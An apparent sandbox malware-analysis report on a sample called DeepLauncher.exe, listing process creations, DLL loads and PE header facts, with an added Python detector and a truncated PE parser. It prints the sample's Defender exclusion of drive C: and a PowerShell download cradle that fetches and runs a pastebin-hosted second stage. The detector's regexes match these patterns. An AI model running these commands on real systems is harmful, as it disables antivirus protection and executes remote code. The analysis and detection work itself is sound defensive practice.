Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP"
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
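The process chain above is the whole infection sequence visible at this stage: the launcher spawns powershell.exe three times with Add-MpPreference -ExclusionPath 'C:' (an exclusion covering the system drive, which only takes effect if the launcher was run elevated), once with -ExecutionPolicy Bypass and an iex (iwr ...) download cradle that pulls a second stage from a pastebin raw URL, and that PowerShell instance then drives csc.exe to compile C# from a response file under %TEMP%. The detector below is an added example, not part of the report or of the sample: it runs three rules over constructed process-creation events copied from the rows above (Sysmon Event ID 1 style fields). The field names, rule names and severities are assumptions.

```python
"""Flag the launcher's PowerShell chain in process-creation telemetry.

Added example; the events below are constructed from the report's
process-creation rows (Sysmon Event ID 1 style fields), not captured logs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
CVTRES = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
LAUNCHER = r"C:\Users\user\Desktop\DeepLauncher.exe"
ADD_EXCLUSION = "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:'"

# Constructed from the report's "Process created" rows, in report order.
EVENTS = [
    ProcEvent("unknown", LAUNCHER, rf'"{LAUNCHER}"'),
    ProcEvent(LAUNCHER, PS, ADD_EXCLUSION),
    ProcEvent(PS, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(LAUNCHER, PS, ADD_EXCLUSION),
    ProcEvent(LAUNCHER, PS, '"powershell.exe" -ExecutionPolicy Bypass -Command '
                            '"iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"'),
    ProcEvent(PS, CSC, rf'"{CSC}" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"'),
    ProcEvent(CSC, CVTRES, rf'{CVTRES} /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp"'),
    ProcEvent(LAUNCHER, PS, ADD_EXCLUSION),
]

_EXCLUSION_RE = re.compile(r"add-mppreference\b.*?-exclusionpath\s+['\"]?([^'\"\s]+)", re.I)
_DRIVE_RE = re.compile(r"^[a-z]:\\?$", re.I)          # bare drive letter or drive root
_IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
_FETCH_RE = re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b", re.I)
_URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
_POLICY_RE = re.compile(r"-e[a-z]*\s+(?:bypass|unrestricted)\b", re.I)   # -ep / -ex / -ExecutionPolicy
_RSP_RE = re.compile(r"@\"?([^\"\s]+\.cmdline)", re.I)


def _leaf(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list[dict]:
    """Return the findings for one event (empty list when nothing matches)."""
    out = []
    image, parent, cmd = _leaf(ev.image), _leaf(ev.parent_image), ev.command_line
    if image == "powershell.exe":
        m = _EXCLUSION_RE.search(cmd)
        if m:
            path = m.group(1)
            out.append({"rule": "defender_exclusion",
                        "severity": "high" if _DRIVE_RE.match(path) else "medium",
                        "detail": path})
        if _IEX_RE.search(cmd) and _FETCH_RE.search(cmd):
            # Pull URLs by pattern, not by quoting: the cradle's nested double quotes are
            # consumed by Windows argument parsing, so PowerShell still gets a working
            # iex (iwr https://... -UseBasicParsing).Content and the quotes are no signal.
            out.append({"rule": "download_cradle", "severity": "high",
                        "detail": " ".join(_URL_RE.findall(cmd))})
        if _POLICY_RE.search(cmd):
            out.append({"rule": "execution_policy_bypass", "severity": "low", "detail": ""})
    if image == "csc.exe" and parent == "powershell.exe":
        m = _RSP_RE.search(cmd)
        rsp = m.group(1) if m else ""
        # A compiler driven by a script host with its inputs under %TEMP% is the
        # Add-Type / dynamic C# pattern; csc.exe under a build tool would not look like this.
        out.append({"rule": "compiler_from_script_host",
                    "severity": "high" if "\\temp\\" in rsp.lower() else "medium",
                    "detail": rsp})
    return out


def triage(events) -> dict:
    """Group findings by rule across an event stream."""
    hits = {}
    for ev in events:
        for f in check_event(ev):
            hits.setdefault(f["rule"], []).append(f)
    return hits


if __name__ == "__main__":
    for rule, items in triage(EVENTS).items():
        print(f"{rule:26} x{len(items)}  {items[0]['severity']:6} {items[0]['detail']}")
```

On a live host, confirm whether the exclusion actually landed rather than trusting the command line: Add-MpPreference needs an elevated caller, so check Get-MpPreference (ExclusionPath) and the configuration-change events (ID 5007) in the Microsoft-Windows-Windows Defender/Operational log. The cradle's URL is the most useful pivot here, since the second stage is never on disk; the csc.exe response file and the .TMP it references under the same Temp directory are the artefacts left behind by whatever that stage compiled.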
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: icu.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\DeepLauncher.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: DeepLauncher.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: DeepLauncher.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: DeepLauncher.exeStatic file information: File size 81384298 > 1048576
Source: DeepLauncher.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: DeepLauncher.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: DeepLauncher.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x161000
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DeepLauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: DeepLauncher.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
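The static PE entries above (image base 0x140000000, DllCharacteristics flags HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF and TERMINAL_SERVER_AWARE, three sections with more than 1 MiB of raw data, and the section names .CLR_UEF, .didat, Section and _RDATA that the report lists further down) are all read from the PE32+ optional header and section table. The following is an added example, not Joe Sandbox code: a small parser that pulls those fields out and applies the report's own triage rules. The header it parses is constructed from the values in the report; the virtual sizes and addresses are made up for the demonstration, and the COMMON_SECTIONS list is an assumption about which names need no second look.

```python
"""Decode the PE32+ header fields behind the static-analysis entries above.

Added example, not Joe Sandbox code. Parses the DOS/NT headers and the section
table, expands DllCharacteristics into the flag names the report prints, and
applies the report's triage rules (image base above 0x60000000, sections with
more than 1 MiB of raw data, section names outside the usual linker set).
"""
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits, from winnt.h.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
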